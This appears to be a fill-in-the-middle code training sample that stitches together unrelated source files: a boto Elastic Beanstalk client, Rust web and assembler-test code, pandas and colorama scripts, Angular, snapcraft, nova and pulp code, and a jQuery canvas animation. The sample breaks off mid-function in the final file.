:param destination_environment_id: The ID of the destination
environment. Condition: You must specify at least the
DestinationEnvironmentID or the DestinationEnvironmentName. You may
also specify both. You must specify the SourceEnvironmentId with
the DestinationEnvironmentId.
:type destination_environment_name: string
:param destination_environment_name: The name of the destination
environment. Condition: You must specify at least the
DestinationEnvironmentID or the DestinationEnvironmentName. You may
also specify both. You must specify the SourceEnvironmentName with
the DestinationEnvironmentName.
"""
params = {}
if source_environment_id:
params['SourceEnvironmentId'] = source_environment_id
if source_environment_name:
params['SourceEnvironmentName'] = source_environment_name
if destination_environment_id:
params['DestinationEnvironmentId'] = destination_environment_id
if destination_environment_name:
params['DestinationEnvironmentName'] = destination_environment_name
return self._get_response('SwapEnvironmentCNAMEs', params)
def terminate_environment(self, environment_id=None, environment_name=None,
terminate_resources=None):
"""Terminates the specified environment.
:type environment_id: string
:param environment_id: The ID of the environment to terminate.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to terminate.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type terminate_resources: boolean
:param terminate_resources: Indicates whether the associated AWS
resources should shut down when the environment is terminated:
true: (default) The user AWS resources (for example, the Auto
Scaling group, LoadBalancer, etc.) are terminated along with the
environment. false: The environment is removed from the AWS
Elastic Beanstalk but the AWS resources continue to operate. For
more information, see the AWS Elastic Beanstalk User Guide.
Default: true Valid Values: true | false
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
if terminate_resources:
params['TerminateResources'] = self._encode_bool(
terminate_resources)
return self._get_response('TerminateEnvironment', params)
def update_application(self, application_name, description=None):
"""
Updates the specified application to have the specified
properties.
:type application_name: string
:param application_name: The name of the application to update.
If no such application is found, UpdateApplication returns an
InvalidParameterValue error.
:type description: string
:param description: A new description for the application. Default: If
not specified, AWS Elastic Beanstalk does not update the
description.
"""
params = {'ApplicationName': application_name}
if description:
params['Description'] = description
return self._get_response('UpdateApplication', params)
def update_application_version(self, application_name, version_label,
description=None):
"""Updates the application version to have the properties.
:type application_name: string
:param application_name: The name of the application associated with
this version. If no application is found with this name,
            UpdateApplicationVersion returns an InvalidParameterValue error.
:type version_label: string
:param version_label: The name of the version to update. If no
            application version is found with this label, UpdateApplicationVersion
returns an InvalidParameterValue error.
:type description: string
:param description: A new description for this release.
"""
params = {'ApplicationName': application_name,
'VersionLabel': version_label}
if description:
params['Description'] = description
return self._get_response('UpdateApplicationVersion', params)
def update_configuration_template(self, application_name, template_name,
description=None, option_settings=None,
options_to_remove=None):
"""
Updates the specified configuration template to have the
specified properties or configuration option values.
:type application_name: string
:param application_name: The name of the application associated with
the configuration template to update. If no application is found
with this name, UpdateConfigurationTemplate returns an
InvalidParameterValue error.
:type template_name: string
:param template_name: The name of the configuration template to update.
If no configuration template is found with this name,
UpdateConfigurationTemplate returns an InvalidParameterValue error.
:type description: string
:param description: A new description for the configuration.
:type option_settings: list
:param option_settings: A list of configuration option settings to
update with the new specified option value.
:type options_to_remove: list
:param options_to_remove: A list of configuration options to remove
from the configuration set. Constraint: You can remove only
UserDefined configuration options.
:raises: InsufficientPrivilegesException
"""
params = {'ApplicationName': application_name,
'TemplateName': template_name}
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if options_to_remove:
self.build_list_params(params, options_to_remove,<|fim▁hole|> def update_environment(self, environment_id=None, environment_name=None,
version_label=None, template_name=None,
description=None, option_settings=None,
options_to_remove=None, tier_name=None,
tier_type=None, tier_version='1.0'):
"""
Updates the environment description, deploys a new application
version, updates the configuration settings to an entirely new
configuration template, or updates select configuration option
values in the running environment. Attempting to update both
the release and configuration is not allowed and AWS Elastic
Beanstalk returns an InvalidParameterCombination error. When
updating the configuration settings to a new template or
individual settings, a draft configuration is created and
DescribeConfigurationSettings for this environment returns two
setting descriptions with different DeploymentStatus values.
:type environment_id: string
:param environment_id: The ID of the environment to update. If no
environment with this ID exists, AWS Elastic Beanstalk returns an
InvalidParameterValue error. Condition: You must specify either
this or an EnvironmentName, or both. If you do not specify either,
AWS Elastic Beanstalk returns MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to update. If no
environment with this name exists, AWS Elastic Beanstalk returns an
InvalidParameterValue error. Condition: You must specify either
this or an EnvironmentId, or both. If you do not specify either,
AWS Elastic Beanstalk returns MissingRequiredParameter error.
:type version_label: string
:param version_label: If this parameter is specified, AWS Elastic
Beanstalk deploys the named application version to the environment.
If no such application version is found, returns an
InvalidParameterValue error.
:type template_name: string
:param template_name: If this parameter is specified, AWS Elastic
Beanstalk deploys this configuration template to the environment.
If no such configuration template is found, AWS Elastic Beanstalk
returns an InvalidParameterValue error.
:type description: string
:param description: If this parameter is specified, AWS Elastic
Beanstalk updates the description of this environment.
:type option_settings: list
:param option_settings: If specified, AWS Elastic Beanstalk updates the
configuration set associated with the running environment and sets
the specified configuration options to the requested value.
:type options_to_remove: list
:param options_to_remove: A list of custom user-defined configuration
options to remove from the configuration set for this environment.
:type tier_name: string
:param tier_name: The name of the tier. Valid values are
"WebServer" and "Worker". Defaults to "WebServer".
The ``tier_name`` and a ``tier_type`` parameters are
related and the values provided must be valid.
The possible combinations are:
* "WebServer" and "Standard" (the default)
* "Worker" and "SQS/HTTP"
:type tier_type: string
:param tier_type: The type of the tier. Valid values are
"Standard" if ``tier_name`` is "WebServer" and "SQS/HTTP"
if ``tier_name`` is "Worker". Defaults to "Standard".
:type tier_version: string
        :param tier_version: The version of the tier. Valid values
currently are "1.0". Defaults to "1.0".
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
if version_label:
params['VersionLabel'] = version_label
if template_name:
params['TemplateName'] = template_name
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if options_to_remove:
self.build_list_params(params, options_to_remove,
'OptionsToRemove.member')
if tier_name and tier_type and tier_version:
params['Tier.Name'] = tier_name
params['Tier.Type'] = tier_type
params['Tier.Version'] = tier_version
return self._get_response('UpdateEnvironment', params)
def validate_configuration_settings(self, application_name,
option_settings, template_name=None,
environment_name=None):
"""
Takes a set of configuration settings and either a
configuration template or environment, and determines whether
those values are valid. This action returns a list of messages
indicating any errors or warnings associated with the selection
of option values.
:type application_name: string
:param application_name: The name of the application that the
configuration template or environment belongs to.
:type template_name: string
:param template_name: The name of the configuration template to
validate the settings against. Condition: You cannot specify both
this and an environment name.
:type environment_name: string
:param environment_name: The name of the environment to validate the
settings against. Condition: You cannot specify both this and a
configuration template name.
:type option_settings: list
:param option_settings: A list of the options and desired values to
evaluate.
:raises: InsufficientPrivilegesException
"""
params = {'ApplicationName': application_name}
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if template_name:
params['TemplateName'] = template_name
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('ValidateConfigurationSettings', params)
def _build_list_params(self, params, user_values, prefix, tuple_names):
# For params such as the ConfigurationOptionSettings,
# they can specify a list of tuples where each tuple maps to a specific
# arg. For example:
        # user_values = [('foo', 'bar', 'baz')]
# prefix=MyOption.member
# tuple_names=('One', 'Two', 'Three')
# would result in:
# MyOption.member.1.One = foo
# MyOption.member.1.Two = bar
# MyOption.member.1.Three = baz
for i, user_value in enumerate(user_values, 1):
current_prefix = '%s.%s' % (prefix, i)
for key, value in zip(tuple_names, user_value):
full_key = '%s.%s' % (current_prefix, key)
params[full_key] = value<|fim▁end|>
|
'OptionsToRemove.member')
return self._get_response('UpdateConfigurationTemplate', params)
|
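The _build_list_params helper above is the piece that turns structured option settings into flat Query-API keys. A minimal, self-contained sketch of the same flattening logic (the helper name is hypothetical, independent of boto):

def build_tuple_params(params, user_values, prefix, tuple_names):
    # Flatten [(namespace, name, value), ...] into AWS Query API keys like
    # OptionSettings.member.1.Namespace, OptionSettings.member.1.OptionName, ...
    for i, user_value in enumerate(user_values, 1):
        for key, value in zip(tuple_names, user_value):
            params['%s.%s.%s' % (prefix, i, key)] = value
    return params

params = build_tuple_params(
    {},
    [('aws:autoscaling:asg', 'MinSize', '2')],
    'OptionSettings.member',
    ('Namespace', 'OptionName', 'Value'))
# params == {'OptionSettings.member.1.Namespace': 'aws:autoscaling:asg',
#            'OptionSettings.member.1.OptionName': 'MinSize',
#            'OptionSettings.member.1.Value': '2'}
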
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>use std::collections::HashMap;
use std::error::Error;
use std::io::{self, Cursor};
use std::sync::Arc;
use rustc_serialize::{json, Encodable};
use rustc_serialize::json::Json;<|fim▁hole|>use conduit::{Request, Response, Handler};
use conduit_router::{RouteBuilder, RequestParams};
use db::RequestTransaction;
use self::errors::NotFound;
pub use self::errors::{CargoError, CargoResult, internal, human, internal_error};
pub use self::errors::{ChainError, std_error};
pub use self::hasher::{HashingReader};
pub use self::head::Head;
pub use self::io_util::LimitErrorReader;
pub use self::lazy_cell::LazyCell;
pub use self::request_proxy::RequestProxy;
pub mod errors;
mod hasher;
mod head;
mod io_util;
mod lazy_cell;
mod request_proxy;
pub trait RequestUtils {
fn redirect(&self, url: String) -> Response;
fn json<T: Encodable>(&self, t: &T) -> Response;
fn query(&self) -> HashMap<String, String>;
fn wants_json(&self) -> bool;
fn pagination(&self, default: usize, max: usize) -> CargoResult<(i64, i64)>;
}
pub fn json_response<T: Encodable>(t: &T) -> Response {
let s = json::encode(t).unwrap();
let json = fixup(s.parse().unwrap()).to_string();
let mut headers = HashMap::new();
headers.insert("Content-Type".to_string(),
vec!["application/json; charset=utf-8".to_string()]);
headers.insert("Content-Length".to_string(), vec![json.len().to_string()]);
return Response {
status: (200, "OK"),
headers: headers,
body: Box::new(Cursor::new(json.into_bytes())),
};
fn fixup(json: Json) -> Json {
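        // "crate" is a reserved keyword in Rust, so the models name the field "krate";
        // rename it back to "crate" before the JSON leaves the API.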
match json {
Json::Object(object) => {
Json::Object(object.into_iter().map(|(k, v)| {
let k = if k == "krate" {
"crate".to_string()
} else {
k
};
(k, fixup(v))
}).collect())
}
Json::Array(list) => {
Json::Array(list.into_iter().map(fixup).collect())
}
j => j,
}
}
}
impl<'a> RequestUtils for Request + 'a {
fn json<T: Encodable>(&self, t: &T) -> Response {
json_response(t)
}
fn query(&self) -> HashMap<String, String> {
url::form_urlencoded::parse(self.query_string().unwrap_or("")
.as_bytes())
.into_iter().collect()
}
fn redirect(&self, url: String) -> Response {
let mut headers = HashMap::new();
headers.insert("Location".to_string(), vec![url.to_string()]);
Response {
status: (302, "Found"),
headers: headers,
body: Box::new(io::empty()),
}
}
fn wants_json(&self) -> bool {
let content = self.headers().find("Accept").unwrap_or(Vec::new());
content.iter().any(|s| s.contains("json"))
}
fn pagination(&self, default: usize, max: usize) -> CargoResult<(i64, i64)> {
let query = self.query();
let page = query.get("page").and_then(|s| s.parse::<usize>().ok())
.unwrap_or(1);
let limit = query.get("per_page").and_then(|s| s.parse::<usize>().ok())
.unwrap_or(default);
if limit > max {
return Err(human(format!("cannot request more than {} items", max)))
}
Ok((((page - 1) * limit) as i64, limit as i64))
}
}
pub struct C(pub fn(&mut Request) -> CargoResult<Response>);
impl Handler for C {
fn call(&self, req: &mut Request) -> Result<Response, Box<Error+Send>> {
let C(f) = *self;
match f(req) {
Ok(resp) => { req.commit(); Ok(resp) }
Err(e) => {
match e.response() {
Some(response) => Ok(response),
None => Err(std_error(e))
}
}
}
}
}
pub struct R<H>(pub Arc<H>);
impl<H: Handler> Handler for R<H> {
fn call(&self, req: &mut Request) -> Result<Response, Box<Error+Send>> {
let path = req.params()["path"].to_string();
let R(ref sub_router) = *self;
sub_router.call(&mut RequestProxy {
other: req,
path: Some(&path),
method: None,
})
}
}
pub struct R404(pub RouteBuilder);
impl Handler for R404 {
fn call(&self, req: &mut Request) -> Result<Response, Box<Error+Send>> {
let R404(ref router) = *self;
match router.recognize(&req.method(), req.path()) {
Ok(m) => {
req.mut_extensions().insert(m.params.clone());
m.handler.call(req)
}
Err(..) => Ok(NotFound.response().unwrap()),
}
}
}<|fim▁end|>
|
use url;
|
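The pagination helper above converts the page/per_page query strings into an SQL offset/limit pair, rejecting oversized pages. The same arithmetic as a hedged Python sketch (names are illustrative, not part of the Rust code):

def pagination(query, default=10, max_per_page=100):
    # 1-based page number; fall back to the defaults on missing or bad input.
    try:
        page = int(query.get('page', 1))
    except ValueError:
        page = 1
    try:
        limit = int(query.get('per_page', default))
    except ValueError:
        limit = default
    if limit > max_per_page:
        raise ValueError('cannot request more than %d items' % max_per_page)
    return ((page - 1) * limit, limit)  # (offset, limit)

assert pagination({'page': '3', 'per_page': '20'}) == (40, 20)
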
<|file_name|>pandas 8 - Standard Deviation.py<|end_file_name|><|fim▁begin|>import pandas as pd
from pandas import DataFrame
from matplotlib import pyplot as plt
from matplotlib import style
style.use('ggplot')
df = pd.read_csv('sp500_ohlc.csv', index_col = 'Date', parse_dates=True)
#print df.head()
# pd.rolling_std() was removed in pandas 0.18+; the rolling() accessor is the modern spelling
df['STD'] = df['Close'].rolling(25, min_periods=1).std()
ax1 = plt.subplot(2, 1, 1)
df['Close'].plot()
plt.ylabel('Close')
# do not do sharex first
ax2 = plt.subplot(2, 1, 2, sharex = ax1)
df['STD'].plot()
plt.ylabel('Standard Deviation')
<|fim▁hole|><|fim▁end|>
|
plt.show()
|
<|file_name|>poid.pipe.ts<|end_file_name|><|fim▁begin|>import { Pipe, PipeTransform } from '@angular/core';
@Pipe({
name: 'poname'
})
export class PoidPipe implements PipeTransform {
transform(item: any, purOrderNo: any): any {<|fim▁hole|> if(purOrderNo == undefined) return item;
//return updated array
return item.filter(function(item){
return item.supplier_id.includes(purOrderNo);
});
}
}<|fim▁end|>
|
    //check if any value is undefined
|
<|file_name|>vpcmpistri.rs<|end_file_name|><|fim▁begin|>use ::{BroadcastMode, Instruction, MaskReg, MergeMode, Mnemonic, OperandSize, Reg, RoundingMode};
use ::RegType::*;<|fim▁hole|>use ::Operand::*;
use ::Reg::*;
use ::RegScale::*;
fn vpcmpistri_1() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM2)), operand2: Some(Direct(XMM6)), operand3: Some(Literal8(114)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 214, 114], OperandSize::Dword)
}
fn vpcmpistri_2() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM0)), operand2: Some(Indirect(EDI, Some(OperandSize::Xmmword), None)), operand3: Some(Literal8(41)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 7, 41], OperandSize::Dword)
}
fn vpcmpistri_3() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM6)), operand2: Some(Direct(XMM0)), operand3: Some(Literal8(0)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 240, 0], OperandSize::Qword)
}
fn vpcmpistri_4() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM2)), operand2: Some(IndirectScaledDisplaced(RBX, Eight, 1057295119, Some(OperandSize::Xmmword), None)), operand3: Some(Literal8(114)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 20, 221, 15, 11, 5, 63, 114], OperandSize::Qword)
}<|fim▁end|>
|
use ::instruction_def::*;
|
<|file_name|>test_sitecustomize.py<|end_file_name|><|fim▁begin|># -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2017,2020 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from textwrap import dedent
from testtools.matchers import Contains, FileContains
from snapcraft.plugins.v1 import _python
from ._basesuite import PythonBaseTestCase
def _create_site_py(base_dir):
site_py = os.path.join(base_dir, "usr", "lib", "pythontest", "site.py")
os.makedirs(os.path.dirname(site_py))
open(site_py, "w").close()
def _create_user_site_packages(base_dir):
user_site_dir = os.path.join(base_dir, "lib", "pythontest", "site-packages")
os.makedirs(user_site_dir)
class SiteCustomizeTestCase(PythonBaseTestCase):
def setUp(self):
super().setUp()
self.expected_sitecustomize = dedent(
"""\
import site
import os
snap_dir = os.getenv("SNAP")
snapcraft_stage_dir = os.getenv("SNAPCRAFT_STAGE")
snapcraft_part_install = os.getenv("SNAPCRAFT_PART_INSTALL")
# Do not include snap_dir during builds as this will include
# snapcraft's in-snap site directory.
if snapcraft_stage_dir is not None and snapcraft_part_install is not None:
site_directories = [snapcraft_stage_dir, snapcraft_part_install]
else:
site_directories = [snap_dir]
for d in site_directories:
if d:
site_dir = os.path.join(d, "lib/pythontest/site-packages")
site.addsitedir(site_dir)
if snap_dir:
site.ENABLE_USER_SITE = False"""
)
def test_generate_sitecustomize_staged(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the staging area
self._create_python_binary(stage_dir)
# Create a site.py in both staging and install areas
_create_site_py(stage_dir)
_create_site_py(install_dir)
# Create a user site dir in install area
_create_user_site_packages(install_dir)
_python.generate_sitecustomize(
"test", stage_dir=stage_dir, install_dir=install_dir
)
site_path = os.path.join(
install_dir, "usr", "lib", "pythontest", "sitecustomize.py"
)
self.assertThat(site_path, FileContains(self.expected_sitecustomize))
def test_generate_sitecustomize_installed(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the installed area
self._create_python_binary(install_dir)
# Create a site.py in both staging and install areas
_create_site_py(stage_dir)
_create_site_py(install_dir)
# Create a user site dir in install area
_create_user_site_packages(install_dir)
_python.generate_sitecustomize(
"test", stage_dir=stage_dir, install_dir=install_dir
)
site_path = os.path.join(
install_dir, "usr", "lib", "pythontest", "sitecustomize.py"
)
self.assertThat(site_path, FileContains(self.expected_sitecustomize))
def test_generate_sitecustomize_missing_user_site_raises(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the installed area
self._create_python_binary(install_dir)
# Create a site.py in both staging and install areas
_create_site_py(stage_dir)
_create_site_py(install_dir)
# Do NOT create a user site dir, and attempt to generate sitecustomize.
raised = self.assertRaises(
_python.errors.MissingUserSitePackagesError,
_python.generate_sitecustomize,<|fim▁hole|> stage_dir=stage_dir,
install_dir=install_dir,
)
self.assertThat(str(raised), Contains("Unable to find user site packages"))
def test_generate_sitecustomize_missing_site_py_raises(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the staging area
self._create_python_binary(stage_dir)
# Create a site.py, but only in install area (not staging area)
_create_site_py(install_dir)
# Create a user site dir in install area
_create_user_site_packages(install_dir)
raised = self.assertRaises(
_python.errors.MissingSitePyError,
_python.generate_sitecustomize,
"test",
stage_dir=stage_dir,
install_dir=install_dir,
)
self.assertThat(str(raised), Contains("Unable to find site.py"))<|fim▁end|>
|
"test",
|
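The sitecustomize payload these tests expect leans entirely on site.addsitedir; a minimal check of that mechanism outside the test harness (the paths are illustrative):

import os
import site
import sys

site_dir = os.path.abspath(os.path.join('install_dir', 'lib', 'pythontest', 'site-packages'))
os.makedirs(site_dir, exist_ok=True)
site.addsitedir(site_dir)  # adds the directory to sys.path and honors any .pth files
assert site_dir in sys.path
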
<|file_name|>demo06.py<|end_file_name|><|fim▁begin|># Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from __future__ import print_function
import fixpath
import colorama
from colorama import Fore, Back, Style
from random import randint, choice
from string import printable
# Fore, Back and Style are convenience classes for the constant ANSI strings that set
#     the foreground, background and style. They don't have any magic of their own.
FORES = [ Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE ]
BACKS = [ Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE ]
STYLES = [ Style.DIM, Style.NORMAL, Style.BRIGHT ]
# This assumes your terminal is 80x24. Ansi minimum coordinate is (1,1).
MINY, MAXY = 1, 24
MINX, MAXX = 1, 80
# set of printable ASCII characters, including a space.
CHARS = ' ' + printable.strip()
PASSES = 1000
def main():
colorama.init()
# gratuitous use of lambda.
pos = lambda y, x: '\x1b[%d;%dH' % (y, x)
# draw a white border.
print(Back.WHITE, end='')
print('%s%s' % (pos(MINY, MINX), ' '*MAXX), end='')
for y in range(MINY, 1+MAXY):
print('%s %s ' % (pos(y, MINX), pos(y, MAXX)), end='')
print('%s%s' % (pos(MAXY, MINX), ' '*MAXX), end='')
# draw some blinky lights for a while.
for i in range(PASSES):<|fim▁hole|>if __name__ == '__main__':
main()<|fim▁end|>
|
print('%s%s%s%s%s' % (pos(randint(1+MINY,MAXY-1), randint(1+MINX,MAXX-1)), choice(FORES), choice(BACKS), choice(STYLES), choice(CHARS)), end='')
# put cursor to top, left, and set color to white-on-black with normal brightness.
print('%s%s%s%s' % (pos(MINY, MINX), Fore.WHITE, Back.BLACK, Style.NORMAL), end='')
|
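The pos lambda above is just the ANSI cursor-position (CUP) escape that colorama makes portable; a hedged standalone sketch of the same idea:

import colorama
colorama.init()  # on Windows, translates the escape into console API calls

def pos(y, x):
    # ESC [ row ; col H : move the cursor to 1-based (row, col)
    return '\x1b[%d;%dH' % (y, x)

print('%sHello from row 5, column 10' % pos(5, 10), end='')
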
<|file_name|>math.rs<|end_file_name|><|fim▁begin|>command!(multiply(_ctx, msg, _args, one: f64, two: f64) {
let product = one * two;<|fim▁hole|> let _ = msg.channel_id.say(&product.to_string());
});<|fim▁end|>
| |
<|file_name|>base.py<|end_file_name|><|fim▁begin|>import os
import unittest
import mock
from pulp.server.db import connection
class PulpWebservicesTests(unittest.TestCase):
"""
Base class for tests of webservice controllers. This base is used to work around the
    authentication tests for each method
"""
<|fim▁hole|> self.patch1 = mock.patch('pulp.server.webservices.controllers.decorators.'
'check_preauthenticated')
self.patch2 = mock.patch('pulp.server.webservices.controllers.decorators.'
'is_consumer_authorized')
self.patch3 = mock.patch('pulp.server.webservices.http.resource_path')
self.patch4 = mock.patch('pulp.server.webservices.http.header')
self.patch5 = mock.patch('web.webapi.HTTPError')
self.patch6 = mock.patch('pulp.server.managers.factory.principal_manager')
self.patch7 = mock.patch('pulp.server.managers.factory.user_query_manager')
self.patch8 = mock.patch('pulp.server.webservices.http.uri_path')
self.mock_check_pre_auth = self.patch1.start()
self.mock_check_pre_auth.return_value = 'ws-user'
self.mock_check_auth = self.patch2.start()
self.mock_check_auth.return_value = True
self.mock_http_resource_path = self.patch3.start()
self.patch4.start()
self.patch5.start()
self.patch6.start()
self.mock_user_query_manager = self.patch7.start()
self.mock_user_query_manager.return_value.is_superuser.return_value = False
self.mock_user_query_manager.return_value.is_authorized.return_value = True
self.mock_uri_path = self.patch8.start()
self.mock_uri_path.return_value = "/mock/"
def tearDown(self):
self.patch1.stop()
self.patch2.stop()
self.patch3.stop()
self.patch4.stop()
self.patch5.stop()
self.patch6.stop()
self.patch7.stop()
self.patch8.stop()
def validate_auth(self, operation):
"""
validate that a validation check was performed for a given operation
:param operation: the operation to validate
"""
self.mock_user_query_manager.return_value.is_authorized.assert_called_once_with(mock.ANY, mock.ANY, operation)
def get_mock_uri_path(self, *args):
"""
:param object_id: the id of the object to get the uri for
:type object_id: str
"""
return os.path.join('/mock', *args) + '/'<|fim▁end|>
|
def setUp(self):
connection.initialize()
|
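setUp and tearDown above start and stop eight patchers by hand; unittest's addCleanup hook removes that bookkeeping. A sketch of the idea, not the project's actual code:

import unittest
import mock

class PulpWebservicesTestsSketch(unittest.TestCase):
    def _patch(self, target):
        patcher = mock.patch(target)
        self.addCleanup(patcher.stop)  # runs even when setUp fails part-way
        return patcher.start()

    def setUp(self):
        self.mock_check_pre_auth = self._patch(
            'pulp.server.webservices.controllers.decorators.check_preauthenticated')
        self.mock_check_pre_auth.return_value = 'ws-user'
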
<|file_name|>vcpu_model.py<|end_file_name|><|fim▁begin|># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils<|fim▁hole|>from nova.db import api as db
from nova.objects import base
from nova.objects import fields
@base.NovaObjectRegistry.register
class VirtCPUModel(base.NovaObject):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'arch': fields.ArchitectureField(nullable=True),
'vendor': fields.StringField(nullable=True),
'topology': fields.ObjectField('VirtCPUTopology',
nullable=True),
'features': fields.ListOfObjectsField("VirtCPUFeature",
default=[]),
'mode': fields.CPUModeField(nullable=True),
'model': fields.StringField(nullable=True),
'match': fields.CPUMatchField(nullable=True),
}
def obj_load_attr(self, attrname):
setattr(self, attrname, None)
def to_json(self):
return jsonutils.dumps(self.obj_to_primitive())
@classmethod
def from_json(cls, jsonstr):
return cls.obj_from_primitive(jsonutils.loads(jsonstr))
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_extra = db.instance_extra_get_by_instance_uuid(
context, instance_uuid, columns=['vcpu_model'])
if not db_extra or not db_extra['vcpu_model']:
return None
return cls.obj_from_primitive(jsonutils.loads(db_extra['vcpu_model']))
@base.NovaObjectRegistry.register
class VirtCPUFeature(base.NovaObject):
VERSION = '1.0'
fields = {
'policy': fields.CPUFeaturePolicyField(nullable=True),
'name': fields.StringField(nullable=False),
}
def obj_load_attr(self, attrname):
setattr(self, attrname, None)<|fim▁end|>
| |
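to_json and from_json above are thin wrappers around the object's primitive form; a hedged round-trip sketch (assumes the nova object registry and fields behave as declared in this module):

model = VirtCPUModel(arch='x86_64', vendor='Intel', model='SandyBridge')
blob = model.to_json()                    # JSON string of obj_to_primitive()
restored = VirtCPUModel.from_json(blob)   # rebuilds an equivalent object
assert restored.model == 'SandyBridge'
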
<|file_name|>script.js<|end_file_name|><|fim▁begin|>$(document).ready(function () {
startAnimation();
});
if (!window.requestAnimationFrame) {
window.requestAnimationFrame = (window.webkitRequestAnimationFrame || window.mozRequestAnimationFrame || window.msRequestAnimationFrame || window.oRequestAnimationFrame || function (callback) {
return window.setTimeout(callback, 1000 / 60);
});
}
<|fim▁hole|> var $canvas = $(canvas),
context = canvas.getContext('2d'),
defaults = {
star: {
color: 'rgba(255, 255, 255, .5)',
width: 2
},
line: {
color: 'rgba(255, 255, 255, .5)',
width: 0.4
},
position: {
x: 0, // This value will be overwritten at startup
y: 0 // This value will be overwritten at startup
},
width: window.innerWidth,
height: window.innerHeight,
velocity: 0.1,
length: 100,
distance: 120,
radius: 150,
stars: []
},
config = $.extend(true, {}, defaults, options);
function Star () {
this.x = Math.random() * canvas.width;
this.y = Math.random() * canvas.height;
this.vx = (config.velocity - (Math.random() * 0.5));
this.vy = (config.velocity - (Math.random() * 0.5));
this.radius = Math.random() * config.star.width;
}
Star.prototype = {
create: function(){
context.beginPath();
context.arc(this.x, this.y, this.radius, 0, Math.PI * 2, false);
context.fill();
},
animate: function(){
var i;
for (i = 0; i < config.length; i++) {
var star = config.stars[i];
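                // bounce off the canvas edges: flip vy at the top/bottom, vx at the left/right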
if (star.y < 0 || star.y > canvas.height) {
star.vx = star.vx;
star.vy = - star.vy;
} else if (star.x < 0 || star.x > canvas.width) {
star.vx = - star.vx;
star.vy = star.vy;
}
star.x += star.vx;
star.y += star.vy;
}
},
line: function(){
var length = config.length,
iStar,
jStar,
i,
j;
for (i = 0; i < length; i++) {
for (j = 0; j < length; j++) {
iStar = config.stars[i];
jStar = config.stars[j];
if (
(iStar.x - jStar.x) < config.distance &&
(iStar.y - jStar.y) < config.distance &&
(iStar.x - jStar.x) > - config.distance &&
(iStar.y - jStar.y) > - config.distance
) {
if (
(iStar.x - config.position.x) < config.radius &&
(iStar.y - config.position.y) < config.radius &&
(iStar.x - config.position.x) > - config.radius &&
(iStar.y - config.position.y) > - config.radius
) {
context.beginPath();
context.moveTo(iStar.x, iStar.y);
context.lineTo(jStar.x, jStar.y);
context.stroke();
context.closePath();
}
}
}
}
}
};
this.createStars = function () {
var length = config.length,
star,
i;
context.clearRect(0, 0, canvas.width, canvas.height);
for (i = 0; i < length; i++) {
config.stars.push(new Star());
star = config.stars[i];
star.create();
}
star.line();
star.animate();
};
this.setCanvas = function () {
canvas.width = config.width;
canvas.height = config.height;
};
this.setContext = function () {
context.fillStyle = config.star.color;
context.strokeStyle = config.line.color;
context.lineWidth = config.line.width;
};
this.setInitialPosition = function () {
if (!options || !options.hasOwnProperty('position')) {
config.position = {
x: canvas.width * 0.5,
y: canvas.height * 0.5
};
}
};
this.loop = function (callback) {
callback();
window.requestAnimationFrame(function () {
this.loop(callback);
}.bind(this));
};
this.bind = function () {
$canvas.on('mousemove', function(e){
config.position.x = e.pageX - $canvas.offset().left;
